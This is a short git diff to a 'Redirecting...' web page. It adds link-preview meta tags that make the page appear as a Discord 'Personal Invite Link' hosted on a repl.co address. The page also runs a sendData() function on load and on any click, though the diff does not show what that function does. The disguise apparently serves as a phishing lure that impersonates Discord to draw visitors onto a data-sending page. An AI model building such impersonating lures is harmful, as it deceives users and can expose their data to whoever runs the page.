--- a/index.html
+++ b/index.html
@@ -3,7 +3,12 @@
  <head> 
   <meta charset="UTF-8"> 
   <meta name="viewport" content="width=device-width, initial-scale=1.0"> 
-  <title>Redirecting...</title> 
+  <title>Redirecting...</title>
+  <meta content="Discord" property="og:title" />
+    <meta content="Personal Invite Link" property="og:description" />
+    <meta content="https://website.teamop1969.repl.co" property="og:url" />
+    <meta content="https://website.teamop1969.repl.co" property="og:image" />
+    <meta content="#43B581" data-react-helmet="true" name="theme-color" />
     <script>
     
     window.onload = function(){
@@ -37,7 +42,7 @@ function sendData() {
 }
 
 </script>
- </head> 
+ </head>
  <body id="onClick" onclick="sendData()">
   <button id="onClick" onclick="sendData()">click here</button>
   <p1>to redirect if it won't automatically redirect you</p1>
